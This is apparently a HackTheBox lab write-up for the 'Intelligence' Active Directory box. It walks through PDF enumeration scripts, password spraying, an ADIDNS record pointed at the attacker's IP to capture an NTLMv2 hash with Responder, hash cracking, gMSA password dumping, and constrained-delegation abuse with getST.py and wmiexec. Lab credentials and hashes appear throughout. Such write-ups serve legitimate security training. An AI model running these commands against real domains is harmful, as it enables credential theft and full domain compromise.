HackTheBox · Lab
Medium · Windows · Active Directory · Kerberos

NOTES

ENUMERATION

## NMAP


    ```shell
    PORT      STATE SERVICE       VERSION
    53/tcp    open  domain        Simple DNS Plus
    
    80/tcp    open  http          Microsoft IIS httpd 10.0
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-title: Intelligence
    |_http-server-header: Microsoft-IIS/10.0
    
    88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-30 13:30:02Z)
    
    135/tcp   open  msrpc         Microsoft Windows RPC
    
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    
    389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    |_ssl-date: 2025-07-30T13:31:32+00:00; +7h00m00s from scanner time.
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    
    445/tcp   open  microsoft-ds?
    
    593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    
    636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    |_ssl-date: 2025-07-30T13:31:32+00:00; +7h00m00s from scanner time.
    
    3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    |_ssl-date: 2025-07-30T13:31:32+00:00; +7h00m00s from scanner time.
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    
    3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    |_ssl-date: 2025-07-30T13:31:31+00:00; +6h59m59s from scanner time.
    
    Host script results:
    |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
    | smb2-time: 
    |   date: 2025-07-30T13:30:54
    |_  start_date: N/A
    | smb2-security-mode: 
    |   3:1:1: 
    |_    Message signing enabled and required
    ```


    Interesting ports


    ```shell
    53,80,88,135,389,445,3268
    ```


## DNS P53


    DNSENUM/NS/DNSRECON


        Null


## HTTP P80


    [image.png: screenshot of the site on port 80, not included]


    WFUZZ/GOBUSTER


        Null


    MANUAL INSPECTION


        contact@intelligence.htb


        Noticed a pattern with the listed files


        ```shell
        <p class="mb-0 text-white-50"><a href="documents/2020-01-01-upload.pdf"
        <p class="mb-0 text-white-50"><a href="documents/2020-12-15-upload.pdf"
        ```


        I created a Python script to enumerate files that might exist, starting with a wordlist of date-based filenames following that pattern:


        ```python
        from datetime import date, timedelta

        # one candidate filename per day, in the YYYY-MM-DD-upload.pdf form seen on the site
        start_date = date(2010, 1, 1)
        end_date = date(2025, 12, 31)
        delta = timedelta(days=1)

        with open("dates_uploads.txt", "w") as f:
            current = start_date
            while current <= end_date:
                f.write(f"{current.strftime('%Y-%m-%d')}-upload.pdf\n")
                current += delta
        ```


        This gave me the output


        ```shell
        ❯ cat dates_uploads.txt
        2010-01-01-upload.pdf
        2010-01-02-upload.pdf
        2010-01-03-upload.pdf
        ...SNIP...
        2025-12-28-upload.pdf
        2025-12-29-upload.pdf
        2025-12-30-upload.pdf
        2025-12-31-upload.pdf
        ```


        Now let’s fuzz `documents/` with this wordlist to see which of the candidate files actually exist.


        We got several hits.


        I created a new script that reads `dates_uploads.txt` and downloads every file the server actually has:


        ```python
        import sys
        import requests

        base_url = "http://intelligence.htb/documents/"

        # read candidate filenames (the list the date script produced)
        try:
            with open("dates_uploads.txt", "r") as file:
                filenames = [line.strip() for line in file if line.strip()]
        except FileNotFoundError:
            print("File 'dates_uploads.txt' not found.")
            sys.exit(1)

        # try each name; only a 200 means the PDF exists, so only those are written to disk
        for name in filenames:
            url = base_url + name
            try:
                response = requests.get(url, timeout=10)
                if response.status_code == 200:
                    print(f"[+] Downloaded {name}")
                    with open(name, "wb") as f:
                        f.write(response.content)
                else:
                    print(f"[-] {name}: status code {response.status_code}")
            except requests.RequestException as e:
                print(f"[!] Error downloading {name}: {e}")
        ```


        ```shell
        exiftool -Creator -csv *pdf | cut -d, -f2
        ```


        gives us the Creator field of every PDF (the first output line is the CSV header, `Creator`). The creators are usernames in `First.Last` form, which become the wordlist for `kerbrute userenum`.
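The whole discovery pipeline in one place, as an added example (not the notes' own scripts, and not the box's files): generate the date-named candidates, probe them through an injectable `fetch`, keep the ones that exist, and pull the `/Creator` string out of each PDF without exiftool. The "site" it runs against is a constructed in-memory dict with two fake PDFs; `http_fetch()` is the drop-in for a real `documents/` base URL. The regex only handles a plain literal-string `/Creator` in an uncompressed Info dictionary, which is an assumption about the PDFs (exiftool also reads hex strings and compressed object streams).

```python
"""Date-named document discovery end to end: generate candidate names, probe
them, keep what exists and pull the /Creator field out of each PDF. Driven by
a constructed in-memory "site" here; http_fetch() does the same over HTTP."""
import re
from datetime import date, timedelta
from typing import Callable, Dict, Iterable, List, Optional


def date_candidates(start: date, end: date, pattern: str = "{}-upload.pdf") -> Iterable[str]:
    """One name per day, both ends inclusive, e.g. 2020-06-04-upload.pdf."""
    cur = start
    while cur <= end:
        yield pattern.format(cur.isoformat())
        cur += timedelta(days=1)


def probe(names: Iterable[str], fetch: Callable[[str], Optional[bytes]]) -> Dict[str, bytes]:
    """Try every candidate; `fetch` returns the body on a hit and None otherwise."""
    return {n: body for n in names if (body := fetch(n)) is not None}


def http_fetch(base_url: str) -> Callable[[str], Optional[bytes]]:
    """Online fetch against base_url (e.g. http://intelligence.htb/documents/)."""
    from urllib.error import HTTPError
    from urllib.request import urlopen

    def fetch(name: str) -> Optional[bytes]:
        try:
            with urlopen(base_url + name, timeout=10) as resp:
                return resp.read()
        except HTTPError as err:
            if err.code == 404:
                return None
            raise
    return fetch


# Literal-string /Creator entry of an uncompressed Info dictionary (assumption:
# exiftool also handles hex strings and compressed object streams, this does not).
CREATOR_RE = re.compile(rb"/Creator\s*\((.*?)(?<!\\)\)", re.S)


def pdf_creator(pdf: bytes) -> Optional[str]:
    """Return the Creator (author) metadata string, or None if absent."""
    m = CREATOR_RE.search(pdf)
    if not m:
        return None
    return m.group(1).replace(rb"\(", b"(").replace(rb"\)", b")").decode("latin-1")


def creator_usernames(docs: Dict[str, bytes]) -> List[str]:
    """Unique creators in discovery order: the list to feed kerbrute userenum."""
    names: List[str] = []
    for body in docs.values():
        creator = pdf_creator(body)
        if creator and creator not in names:
            names.append(creator)
    return names


def fake_pdf(creator: str, text: str) -> bytes:
    """Constructed minimal PDF-like document with an Info dictionary (demo only)."""
    return (b"%PDF-1.4\n1 0 obj << /Creator (" + creator.encode() + b") /Producer (Demo) >> endobj\n"
            b"2 0 obj << /Length " + str(len(text)).encode() + b" >> stream\n" + text.encode()
            + b"\nendstream endobj\n%%EOF\n")


# Constructed sample site: two of the 366 dates in 2020 exist, creators are made up.
FAKE_SITE = {
    "2020-06-04-upload.pdf": fake_pdf("Tiffany.Molina", "New Account Guide"),
    "2020-12-30-upload.pdf": fake_pdf("Ted.Graves", "Internal IT Update"),
}


def run_demo():
    """Probe all of 2020 against the fake site; return (hits, creators)."""
    hits = probe(date_candidates(date(2020, 1, 1), date(2020, 12, 31)), FAKE_SITE.get)
    return sorted(hits), creator_usernames(hits)


if __name__ == "__main__":
    found, users = run_demo()
    print("found:", found)
    print("users:", users)
```

Against the real target you would call `probe(date_candidates(...), http_fetch("http://intelligence.htb/documents/"))` and write the bodies to disk; the in-memory path exists so the parsing and de-duplication can be checked offline.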


        Converting pdfs to txt


        ```shell
        for f in *.pdf; do pdftotext "$f"; done
        ```


        Now it is easier to find something useful.


        We `head` all the text files to begin with and see if anything sticks out.


        Found 2 interesting files


        ```shell
        ==> 2020-06-04-upload.txt <==
        New Account Guide
        
        ==> 2020-12-30-upload.txt <==
        Internal IT Update
        ```


        Content


        ```shell
        ❯ cat 2020-06-04-upload.txt
        New Account Guide
        Welcome to Intelligence Corp!
        Please login using your username and the default password of:
        NewIntelligenceCorpUser9876
        After logging in please change your password as soon as possible.
        
        ❯ cat 2020-12-30-upload.txt
        Internal IT Update
        There has recently been some outages on our web servers. Ted has gotten a
        script in place to help notify us if this happens again.
        Also, after discussion following our recent security audit we are in the process
        of locking down our service accounts.
        ```


        Password found

        - `NewIntelligenceCorpUser9876`

## SMB P139/445


    ANON AUTH SUCCESS but null enum


    RPCCLIENT null


    PASSWORD SPRAYING


        Sprayed `NewIntelligenceCorpUser9876` against the user list validated with kerbrute (`kerbrute_users`) and got 1 hit


        ```shell
        [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
        ```


    SHARE ENUM


        ```shell
        SHARE      PERMISSIONS   REMARK
        ---------- ------------ -------------------------------------------------
        ADMIN$                   Remote Admin
        C$                      Default share
        IPC$       READ          Remote IPC
        IT         READ          
        NETLOGON   READ          Logon server share
        SYSVOL     READ          Logon server share
        Users      READ
        ```


        Interesting:


        //IT


        `downdetector.ps1`:

        ```powershell
        # Check web server status. Scheduled to run every 5min
        Import-Module ActiveDirectory 
        foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
            try {
                $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
                if(.StatusCode -ne 200) {
                    Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
                }
            } catch {}
        }
        ```

        The script (kept as found on the share) enumerates every DNS record in the zone whose name starts with `web` and requests it with `-UseDefaultCredentials`, so whichever account runs the scheduled task will NTLM-authenticate to any host we can register under such a name.


        //Users


        ```shell
        Administrator
        All Users
        Default
        Default User
        Public
        Ted.Graves
        Tiffany.Molina
        ```

FOOTHOLD

Running `kerbrute userenum` with the creator names from the PDF metadata confirmed every one of them as an existing domain user.


The script requests every `web*` DNS record in the zone with the task account's credentials. By default, Authenticated Users may create child objects in the AD-integrated DNS zone (ADIDNS), so as Tiffany.Molina we add an A record named `webnrg` (it must match `web*`) that points to our own IP:


```shell
❯ dnstool.py -u 'intelligence\Tiffany.Molina' -p $PASS -r webnrg.$DOMAIN -a add -t A -d 10.10.14.13 $IP
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
```


Capturing this with `responder`: its HTTP server answers the request with a 401 and an NTLM challenge, and because the task uses `-UseDefaultCredentials` it completes the handshake with the task account's credentials. Allow a few minutes for the DNS server to serve the new record and for the 5-minute task to fire.


[image.png: Responder output screenshot, not included]


NTLMv2


```shell
Ted.Graves::intelligence:a78cc6f6cac...SNIP...
```


Which was crackable with hashcat (mode 5600, NetNTLMv2) and rockyou


```shell
TED.GRAVES::intelligence:a78cc6....SNIP...000:Mr.Teddy
```


Password found

- `Mr.Teddy`

PRIVILEGE ESCALATION

BLOODHOUND


    [image.png: BloodHound graph screenshot, not included]


    The gMSA `SVC_INT$` has its managed password readable by the `itsupport` group (ReadGMSAPassword). `gMSADumper.py` reads `msDS-ManagedPassword` over LDAP and derives the account's NT hash and Kerberos keys from it; the dump below succeeding as Ted.Graves means our account is covered by one of the listed principals:


    ```shell
    gMSADumper.py -u $USER -p $PASS -d $DOMAIN
    Users or groups who can read password for svc_int$:
     > DC$
     > itsupport
    svc_int$:::a9f4721de917a40fd9010ad815708184
    svc_int$:aes256-cts-hmac-sha1-96:0ceb5372ef23f53495569d0c64710ce13f5d44684bbb2ad6ece5556b3dbe878b
    svc_int$:aes128-cts-hmac-sha1-96:3ba46b3946bf3a03d35e75f23db2ad90
    ```


    `svc_int$` is trusted for constrained delegation to `WWW/dc.intelligence.htb` (its `msDS-AllowedToDelegateTo`), so with its NT hash we can ask the KDC for a service ticket to that SPN as Administrator through S4U2Self followed by S4U2Proxy, using `getST.py`. This is a legitimately issued ticket rather than a silver ticket (nothing is forged); it is encrypted with the DC machine account key, which is why a ticket whose SPN says `WWW` is also accepted by SMB/WMI on the same host.


    ```shell
    ❯ getST.py -spn WWW/$HOST.$DOMAIN -impersonate $TARGETUSER $DOMAIN/$USER -hashes :$HASH
    Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 
    
    [-] CCache file is not found. Skipping...
    [*] Getting TGT for user
    [*] Impersonating administrator
    [*] Requesting S4U2self
    [*] Requesting S4U2Proxy
    [*] Saving ticket in administrator@WWW_DC.intelligence.htb@INTELLIGENCE.HTB.ccache
    ```


    Make sure the clock skew is not too great: Kerberos rejects requests whose timestamp is more than 5 minutes off the KDC (`KRB_AP_ERR_SKEW`), and nmap reported our clock about 7 hours off the DC, so sync against the DC (e.g. with `ntpdate`) before running `getST.py`. Then export `KRB5CCNAME` pointing at the saved ccache and use the ticket:


    ```shell
    ❯ wmiexec.py -k -no-pass dc.intelligence.htb
    Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 
    
    [*] SMBv3.0 dialect used
    [!] Launching semi-interactive shell - Careful what you execute
    [!] Press help for extra shell commands
    C:\>whoami
    intelligence\administrator
    ```


SCOPE

| IP | HOSTNAME | DOMAIN NAME | OS |
| --- | --- | --- | --- |
| 10.10.10.248 | DC | intelligence.htb | Win 10/Server 2019 x64 |

WEB SERVICE TECHNOLOGY

WEB

IIS 10.0 Windows Server

NIKTO

NULL

WFUZZ / GOBUSTER

FILES

DIRS

SUBDIRS

VHOSTS

USERS

```shell
Administrator
All Users
Default
Default User
Public
Ted.Graves
Tiffany.Molina
```

CREDENTIALS

```shell
# Password found
NewIntelligenceCorpUser9876

# valid creds
Tiffany.Molina:NewIntelligenceCorpUser9876
Ted.Graves:Mr.Teddy
```

NMAP

```shell
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
9389/tcp  open  adws
49666/tcp open  unknown
49691/tcp open  unknown
49692/tcp open  unknown
49711/tcp open  unknown
49717/tcp open  unknown
49740/tcp open  unknown
```

SMB SHARES

```shell
SHARE      
----------
ADMIN$
C$
IPC$
IT
NETLOGON
SYSVOL
Users
```

OTHER NOTES

```shell
ADIDNS abuse
ReadGMSAPassword abuse
Constrained delegation abuse
```

LOGS

IppSec Notes

https://youtu.be/Jg_BjkxdtsE

Capture NTLM with MSF

auxiliary(server/capture/http_ntlm)


0xNRG